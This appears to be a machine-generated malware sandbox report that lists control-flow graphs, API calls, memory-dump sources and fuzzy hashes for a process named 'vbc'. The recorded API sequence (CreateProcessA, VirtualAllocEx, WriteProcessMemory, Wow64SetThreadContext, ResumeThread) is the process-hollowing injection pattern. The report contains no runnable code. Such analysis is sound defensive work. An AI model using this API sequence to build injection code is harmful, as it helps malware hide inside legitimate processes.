                                            control_flow_graph 2615 fadb48-fadbe1 2617 fadc2a-fadc52 2615->2617 2618 fadbe3-fadbfa 2615->2618 2621 fadc98-fadcee 2617->2621 2622 fadc54-fadc68 2617->2622 2618->2617 2623 fadbfc-fadc01 2618->2623 2630 fadcf0-fadd04 2621->2630 2631 fadd34-fade2b CreateProcessA 2621->2631 2622->2621 2632 fadc6a-fadc6f 2622->2632 2624 fadc03-fadc0d 2623->2624 2625 fadc24-fadc27 2623->2625 2627 fadc0f 2624->2627 2628 fadc11-fadc20 2624->2628 2625->2617 2627->2628 2628->2628 2633 fadc22 2628->2633 2630->2631 2640 fadd06-fadd0b 2630->2640 2651 fade2d-fade33 2631->2651 2652 fade34-fadf19 2631->2652 2634 fadc92-fadc95 2632->2634 2635 fadc71-fadc7b 2632->2635 2633->2625 2634->2621 2637 fadc7f-fadc8e 2635->2637 2638 fadc7d 2635->2638 2637->2637 2641 fadc90 2637->2641 2638->2637 2642 fadd2e-fadd31 2640->2642 2643 fadd0d-fadd17 2640->2643 2641->2634 2642->2631 2645 fadd1b-fadd2a 2643->2645 2646 fadd19 2643->2646 2645->2645 2647 fadd2c 2645->2647 2646->2645 2647->2642 2651->2652 2664 fadf1b-fadf1f 2652->2664 2665 fadf29-fadf2d 2652->2665 2664->2665 2666 fadf21 2664->2666 2667 fadf2f-fadf33 2665->2667 2668 fadf3d-fadf41 2665->2668 2666->2665 2667->2668 2669 fadf35 2667->2669 2670 fadf43-fadf47 2668->2670 2671 fadf51-fadf55 2668->2671 2669->2668 2670->2671 2672 fadf49 2670->2672 2673 fadf8b-fadf96 2671->2673 2674 fadf57-fadf80 2671->2674 2672->2671 2674->2673
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FADE0F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 8a621252c2738f42c2d5fae423bf957622203832b4756433fd67263421cbe214
                                            • Instruction ID: 5edb63cd64a52383b404790d4447d3f7b194c944999c505926b46eadd47cd08b
                                            • Opcode Fuzzy Hash: 8a621252c2738f42c2d5fae423bf957622203832b4756433fd67263421cbe214
                                            • Instruction Fuzzy Hash: EFC116B0D0021D8FDB20DFA4C841BEDBBB1BF49314F0095A9E91AB7640EB749A85DF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2678 fad6c0-fad72b 2680 fad72d-fad73f 2678->2680 2681 fad742-fad7a9 WriteProcessMemory 2678->2681 2680->2681 2683 fad7ab-fad7b1 2681->2683 2684 fad7b2-fad804 2681->2684 2683->2684
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00FAD793
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: eef4eff49a2e46232026f10a7074053d47bc0c0bd90f5d3a26286dcaef62af73
                                            • Instruction ID: 37d3503c78917d3fd07d857250b6e44199a0ae636282ae50a9a947edb765998e
                                            • Opcode Fuzzy Hash: eef4eff49a2e46232026f10a7074053d47bc0c0bd90f5d3a26286dcaef62af73
                                            • Instruction Fuzzy Hash: C841BBB4D012489FCF04CFA9D884AEEFBF1BB49314F20942AE815B7200D774AA45CF64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2689 fad870-fad938 ReadProcessMemory 2692 fad93a-fad940 2689->2692 2693 fad941-fad993 2689->2693 2692->2693
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00FAD922
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 8b447aa614fbe963d25cab5c666f9a2c92e668437fcbe4e08fd59fd339bd7952
                                            • Instruction ID: 728b64cd607c8c5fc48e03cf7e0c40cf74908dfe1c3e6a1e9bbccf923b001538
                                            • Opcode Fuzzy Hash: 8b447aa614fbe963d25cab5c666f9a2c92e668437fcbe4e08fd59fd339bd7952
                                            • Instruction Fuzzy Hash: 7341BAB4D042589FCF10CFA9D884AEEFBB1BF49310F10942AE815B7200D775A945CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2698 fad548-fad608 VirtualAllocEx 2701 fad60a-fad610 2698->2701 2702 fad611-fad65b 2698->2702 2701->2702
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00FAD5F2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 9c004bddd37feb1ddb06f7ff051c00ecbc7a09febadada513bffe18005dfe46f
                                            • Instruction ID: de69ffedd88c59f6d39b2e223fe114eca636b4e7130ee9d7e685aa773dc2069a
                                            • Opcode Fuzzy Hash: 9c004bddd37feb1ddb06f7ff051c00ecbc7a09febadada513bffe18005dfe46f
                                            • Instruction Fuzzy Hash: 244199B4D042589FCF10CFA9D884ADEBBB1BF49314F10942AE815BB310D775A905CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2707 fad288-fad2e8 2709 fad2ea-fad2fc 2707->2709 2710 fad2ff-fad34d Wow64SetThreadContext 2707->2710 2709->2710 2712 fad34f-fad355 2710->2712 2713 fad356-fad3a2 2710->2713 2712->2713
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 00FAD337
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 3bb445b899c8de0835597b7f1fd2b2232158da6931b586de79ffdf36dcb54093
                                            • Instruction ID: b8a7cdfc321dbd6de5c31644aac9c20a3f6f0bf7a413dc546f7d4d6f6ed017aa
                                            • Opcode Fuzzy Hash: 3bb445b899c8de0835597b7f1fd2b2232158da6931b586de79ffdf36dcb54093
                                            • Instruction Fuzzy Hash: 0E41ACB5D012589FCB10CFA9D884AEEBBB1BF49314F14842AE415B7240D779AA45CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2718 fad148-fad1dc ResumeThread 2721 fad1de-fad1e4 2718->2721 2722 fad1e5-fad227 2718->2722 2721->2722
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 00FAD1C6
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 80679e992a00ad267f41dd5b6afad48d2c76adf1fe9d63410038d32e95992745
                                            • Instruction ID: 627494fa3bd0b9d062aaf06a37dfa73030f7269a4a0792aec007249f567f074e
                                            • Opcode Fuzzy Hash: 80679e992a00ad267f41dd5b6afad48d2c76adf1fe9d63410038d32e95992745
                                            • Instruction Fuzzy Hash: F43199B4D012189FCF14CFA9E884AAEFBB5AF49314F14942AE815B7340D775A901CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2831 42ae27-42ae49 2832 42ae50-42ae9c 2831->2832 2833 42ae4b 2831->2833 2839 42aea5-42aeac 2832->2839 2833->2832 2840 42aeae-42aeb7 2839->2840 2841 42aecd 2839->2841 2843 42aeb9-42aebc 2840->2843 2844 42aebe-42aec1 2840->2844 2842 42aed0-42aedc 2841->2842 2845 42aecb 2843->2845 2844->2845 2845->2842
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PSp
                                            • API String ID: 0-91523618
                                            • Opcode ID: c0d194bbbe17291d221e24decbbf89e570541d613529e8dfb57fef0c8539e689
                                            • Instruction ID: d2b8c3086d80105a9f7fae0c91d67a6be51097c5943fe0b93331bc9873ac2e4e
                                            • Opcode Fuzzy Hash: c0d194bbbe17291d221e24decbbf89e570541d613529e8dfb57fef0c8539e689
                                            • Instruction Fuzzy Hash: 2921F474E04219DFCF04DFA9D8446EEBBB1BB49300F21852AD815B3350E7384A42DF96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 11fbd7ef73bf545b08d4bd66d10e60f5652c73e626f8379e6adf51570675c13a
                                            • Instruction ID: 33b0a3b4b57919ab80acc11cfb7a5946c530e8005918331aa89f8d275deecb97
                                            • Opcode Fuzzy Hash: 11fbd7ef73bf545b08d4bd66d10e60f5652c73e626f8379e6adf51570675c13a
                                            • Instruction Fuzzy Hash: D7021334A00219CFCB04DFB4C595EADB7B2FF8A304F2585A9E505AB365DB35AD42CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a28a8b911fcb2076067b73b4268070eda5766f25ce0abcb6743a150f9abb651f
                                            • Instruction ID: 6b058d5b27d8349b3f63b398aae9a2085feb9e0136c1359e2dfcb89de3b7330f
                                            • Opcode Fuzzy Hash: a28a8b911fcb2076067b73b4268070eda5766f25ce0abcb6743a150f9abb651f
                                            • Instruction Fuzzy Hash: E0022334A00219CFCB04DFB4C595EAEB7B2FF8A304F2585A9E505AB365DB35AD42CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d78c802f461292f3a54c135374eb4fa6091e6bdfc495b0ec3a76eb3af3c983cb
                                            • Instruction ID: 8446cb49aa3b4222287eedca3d22e569f0358cadc36e0a1d069682fdf65145d7
                                            • Opcode Fuzzy Hash: d78c802f461292f3a54c135374eb4fa6091e6bdfc495b0ec3a76eb3af3c983cb
                                            • Instruction Fuzzy Hash: DB214F3094E3D45FDB03977898A49CD7FB05F13285F4A41DBC095DB263D2298949C762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66d32f15375a3e3693da84aa270bba8acb2c80c4a3ebb57c017921067206f4c4
                                            • Instruction ID: c852f59cbe3b16a7e66c3aa1248f8f471399f57479b475fa166477913208a204
                                            • Opcode Fuzzy Hash: 66d32f15375a3e3693da84aa270bba8acb2c80c4a3ebb57c017921067206f4c4
                                            • Instruction Fuzzy Hash: C361F770E05228CFDF14CFAAD5446EEBBB2FB89300F24C42AD419A7251D7789945CF96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 559ff01142d43d1926bc2bcac6b1cd1549634a90468410cd59c72a4f1a2d4127
                                            • Instruction ID: 68f84b4aa5a9550c10486a5a1fdb884aac1b1d285e5ffbfa6939c401b27b1db4
                                            • Opcode Fuzzy Hash: 559ff01142d43d1926bc2bcac6b1cd1549634a90468410cd59c72a4f1a2d4127
                                            • Instruction Fuzzy Hash: 1A7106B0E04268CFCB14DFA9D8546AEBBF1FF89300F61842AD805A7365DB745985CF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c5b27f62f52c0aadb2d82f375207db7d6c58bc496acbfff079eea58d8ede887
                                            • Instruction ID: a3e0b40d4b3d64a07e57ff85790a0271761cb4d596547827330226589800bd1d
                                            • Opcode Fuzzy Hash: 6c5b27f62f52c0aadb2d82f375207db7d6c58bc496acbfff079eea58d8ede887
                                            • Instruction Fuzzy Hash: D261E6B0E00228CFDB14DFA9E8546AEBBB1FF49304F61842AD815B7364DB745985CF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 86c8c0f7f62cfde15c68192929bf16209f5cf10d1d410259c3923e43e73eb15f
                                            • Instruction ID: c96abef1abde6660130251fa4a5705bd9a4e3d74b81476719c01bfb22c6c731b
                                            • Opcode Fuzzy Hash: 86c8c0f7f62cfde15c68192929bf16209f5cf10d1d410259c3923e43e73eb15f
                                            • Instruction Fuzzy Hash: 8751FA74E05229CFDB04CFAAE9446EEBBB2BF89300F60802AD815B7350D7785956CF56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2fe95723f8e741070302f648f297f83bd97712063e2dee6cc1d66bbec0d17c3d
                                            • Instruction ID: 32fa6715a903c7088b58ef87d6c5c705ab2345edf800a5d236b97d81ad50c91c
                                            • Opcode Fuzzy Hash: 2fe95723f8e741070302f648f297f83bd97712063e2dee6cc1d66bbec0d17c3d
                                            • Instruction Fuzzy Hash: 5351E3B0E04229CFCB04CFA9D980AADFBF2BF88304F15856AE409A7355D734AD41CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f589d30dae302e8308de569ea9b19519af474fd9b7d2039e6766dad4597f70b7
                                            • Instruction ID: a6a0d55f5883f843629f849a520b168bf1be49780a65f71c8ac2f37ab53d2377
                                            • Opcode Fuzzy Hash: f589d30dae302e8308de569ea9b19519af474fd9b7d2039e6766dad4597f70b7
                                            • Instruction Fuzzy Hash: 8351F470E10258DFDB50DFA8E948B9DBBF1FB49304F0181AAD809AB390EB749981CF55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1885b190c13f58fe9a7693e5bfcf9b51e37b6a6e0f6ffc50e0f6ff509fe3bbf9
                                            • Instruction ID: 36de6c2a36e9eee8695515586a511ba57a65c9894dbab4d82e947d673772d94c
                                            • Opcode Fuzzy Hash: 1885b190c13f58fe9a7693e5bfcf9b51e37b6a6e0f6ffc50e0f6ff509fe3bbf9
                                            • Instruction Fuzzy Hash: F2217571E08259CFCB05CFA9D8406EEBBF1EF8A304F08806AD409E7352D7385A46CB80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89e5dd3a46ac1e43cc14cae34f9a1c214a041ef521d1d480183c9aa5484e36df
                                            • Instruction ID: 0c37bdaf7bb887fdf0ea9f676e23d6566761d115b5b035ee5d0c8df518856361
                                            • Opcode Fuzzy Hash: 89e5dd3a46ac1e43cc14cae34f9a1c214a041ef521d1d480183c9aa5484e36df
                                            • Instruction Fuzzy Hash: 7D318270E04248AFC705EBB8C551AAEBBB1AF8A300F2581EED044E7362CB355E44DB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464427056.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 179f696809f924e806838304a842f2009b21b096a8d9d6d308ff1fcbf109d08a
                                            • Instruction ID: 3ad00643eb152293fb04804d62af3e0f8a63a3554f338e53df4682f663c05bc8
                                            • Opcode Fuzzy Hash: 179f696809f924e806838304a842f2009b21b096a8d9d6d308ff1fcbf109d08a
                                            • Instruction Fuzzy Hash: 3221F575608344DFDB14EF20E884B1ABB61EB88318F30C569E9094B286C73AD906CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464427056.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88e9c18f81a981450c6f9dbfce1df0f2f93a7cfc2349fb13512662ff3748ba3b
                                            • Instruction ID: 9f7a2c50a4510b9b3ca50e8b5a7c995fd62c9ac6d3b7d455738f9b3b9498c578
                                            • Opcode Fuzzy Hash: 88e9c18f81a981450c6f9dbfce1df0f2f93a7cfc2349fb13512662ff3748ba3b
                                            • Instruction Fuzzy Hash: CB210775508344EFDB05EF10E5C4B2ABBA2FB88318F20C56DE9094B286C336D906CF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 343a2d426c198660013d63da6aab71d74cb241247b1bb7882bb5a7dfb73eabaa
                                            • Instruction ID: 5b25275a04547fde7c3390a823bb49d5a941323831776d20aa3069d84b4c4cf8
                                            • Opcode Fuzzy Hash: 343a2d426c198660013d63da6aab71d74cb241247b1bb7882bb5a7dfb73eabaa
                                            • Instruction Fuzzy Hash: FE211A70E00118EFC744EBB8D541AAEB7F2EF89304F6085A9E419B7361DB356E44DB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc06659fd4213ec4343dc4911de192c4f8b6885670f96e700405b6cebed5bebe
                                            • Instruction ID: c57002371ee77608feb233e0f5cc3d15aa01e16ca0c7c25da1eaca826831ea1d
                                            • Opcode Fuzzy Hash: bc06659fd4213ec4343dc4911de192c4f8b6885670f96e700405b6cebed5bebe
                                            • Instruction Fuzzy Hash: 4E216F71E04228DBCB009FA4E8187EEB7B4FB0A311F545016D846A3250C7794995DF9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c146b0f7f03988e309b18021aa459fd5c3b06ceb928c1471737ae4a0456440a
                                            • Instruction ID: 73bdc965873aa3213764125378385ba1034b35441051c88fdadf64377fb0f739
                                            • Opcode Fuzzy Hash: 9c146b0f7f03988e309b18021aa459fd5c3b06ceb928c1471737ae4a0456440a
                                            • Instruction Fuzzy Hash: 67312A30A11268DFDB60DF24D848BACBBB1FB4A345F0085EAD509A7294DB745A81CF12
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d84bff3f8d0fb9de5e5fadd5cc3c74fbe990625a886dda3e1a5f0921dad557b
                                            • Instruction ID: af5c11ccd74ec9963de817b1611c64d29ed62267375b0ee03556846830c787da
                                            • Opcode Fuzzy Hash: 0d84bff3f8d0fb9de5e5fadd5cc3c74fbe990625a886dda3e1a5f0921dad557b
                                            • Instruction Fuzzy Hash: 64117F71E04228DFCB10DFA4E8586EEBBB4FB4A311F64501AD846A3350C7794995CF9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464427056.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae0d2756050860a682f55fd60858f3ae261f8a767e1dfdbfe973c6fca6b5e31b
                                            • Instruction ID: 228cf0e89412b303fba9d0c34e37e4c0fd20adc39d2a519509e7e19385aa3277
                                            • Opcode Fuzzy Hash: ae0d2756050860a682f55fd60858f3ae261f8a767e1dfdbfe973c6fca6b5e31b
                                            • Instruction Fuzzy Hash: F511BE75508384CFCB11CF10E584B15BB61FB44314F24C6A9E8094B696C33AD90ACF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464427056.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae0d2756050860a682f55fd60858f3ae261f8a767e1dfdbfe973c6fca6b5e31b
                                            • Instruction ID: 0ba50816e394b9865a0cd170841a31f0827e461ac2be4a64da549cbe77563cb4
                                            • Opcode Fuzzy Hash: ae0d2756050860a682f55fd60858f3ae261f8a767e1dfdbfe973c6fca6b5e31b
                                            • Instruction Fuzzy Hash: 9F11BB75504384DFCB02DF10E5C4B15BBA2FB84314F24C6A9D8094B296C33AD90ACF62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464387754.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_17d000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5630745314a2c32023c05fc77479dc97486828a4b4493670583412d36417f8fd
                                            • Instruction ID: ba8c1441997d239439f91f3c703a31d029bfbcbabce2004cc4e2a601f6ae17a3
                                            • Opcode Fuzzy Hash: 5630745314a2c32023c05fc77479dc97486828a4b4493670583412d36417f8fd
                                            • Instruction Fuzzy Hash: 7901F7740083489AD7104A16D884B27BBF8DF41364F25C45AED085B187C778EC02C771
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3e9eeb0cc1350cf1fb0e257b55164f05d576e4b32e8cacee20299a72ba7f694
                                            • Instruction ID: f4b4e5fd6b8345e4c9872cf161a5ea7b58e6fc7b9416131b21d64daaa57fda1f
                                            • Opcode Fuzzy Hash: e3e9eeb0cc1350cf1fb0e257b55164f05d576e4b32e8cacee20299a72ba7f694
                                            • Instruction Fuzzy Hash: 75F0C23090D2849FD306DB64D855AA9BFB49F43204F1A81EBD088DB1A3D7344E48C365
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c38e3446c85ab280756fd302d49728a0e758a3984600d8f12734451e03d069df
                                            • Instruction ID: 338982c4f015501051cab3970762a325e24b67d3e6ccff418dd46130c2fbc38e
                                            • Opcode Fuzzy Hash: c38e3446c85ab280756fd302d49728a0e758a3984600d8f12734451e03d069df
                                            • Instruction Fuzzy Hash: 0CF08220549248AFC716FBB09851AAE7BA4CF43214B1104AED549E72A3DA394E44D7A6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d36c779aaf3919a3f1b9483f42db0c389038a60514bfb4a03a183cabdd4375a
                                            • Instruction ID: 76f77cf0e0731fcc40bca1fe82bf11fe892820bafce9c7b9facf631bf3aeb8b3
                                            • Opcode Fuzzy Hash: 6d36c779aaf3919a3f1b9483f42db0c389038a60514bfb4a03a183cabdd4375a
                                            • Instruction Fuzzy Hash: 8811F330900229DFDB60DF64E848B5CBBB1FB49305F50C4A9C449A7254DF749A858F55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464387754.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_17d000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 24b1e5f9c7f03e58a890b380d4fe1b7fc093c68c48a298c5a501b2de3ff15444
